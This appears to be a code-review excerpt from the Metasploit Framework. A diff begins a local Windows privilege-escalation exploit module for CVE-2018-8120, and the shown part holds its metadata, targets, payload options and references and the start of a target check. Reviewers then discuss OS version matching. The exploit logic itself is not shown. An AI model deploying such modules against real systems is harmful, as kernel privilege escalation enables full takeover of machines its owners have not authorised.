modules/exploits/windows/local/ms18_8120_win32k_privesc.rb

```diff
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+
+
+  def initialize(info={})
+    super(update_info(info,
+    'Name'            => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',
+    'Description'     => %q{
+      This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2
+      when the Win32k component fails to properly handle objects in memory. An attacker who
+      successfully exploited this vulnerability could run arbitrary code in kernel mode. An
+      attacker could then install programs; view, change, or delete data; or create new
+      accounts with full user rights.
+
+      This module has been tested against windows 7 x64 and windows server 2008 R2 standard x64.
+    },
+    'License'         => MSF_LICENSE,
+    'Author'          => [
+        'unamer', # Exploit PoC
+        'bigric3', # Analysis and exploit
+        'Anton Cherepanov', # Vulnerability discovery
+        'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit module
+      ],
+    'Platform'        => 'win',
+    'SessionTypes'    => [ 'meterpreter' ],
+    'DefaultOptions'  => {
+        'EXITFUNC'    => 'thread'
+      },
+    'Targets'         => [
+        [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
+        [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
+      ],
+    'Payload'         => {
+        'Space'       => 4096,
+        'DisableNops' => true
+      },
+    'References'      => [
+        ['BID', '104034'],
+        ['CVE', '2018-8120'],
+        ['URL', 'https://github.com/unamer/CVE-2018-8120'],
+        ['URL', 'https://github.com/bigric3/cve-2018-8120'],
+        ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
+      ],
+    'DisclosureDate'  => 'May 9 2018',
+    'DefaultTarget'   => 0
+    ))
+  end
+
+  def validate_target
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['OS'] =~ /XP/
```

Comment:
Would a NT version check make more sense? Presumably this doesn't work on Windows 98 either.

Reply:
`    if sysinfo['OS'] =~ /XP|NT/i`

^ that's not quite what I meant. Not sure if matching `XP` will false match? I meant checking if the NT version is `6.1`, `6.2`, etc. But none of the other modules seem to do this, so whatever.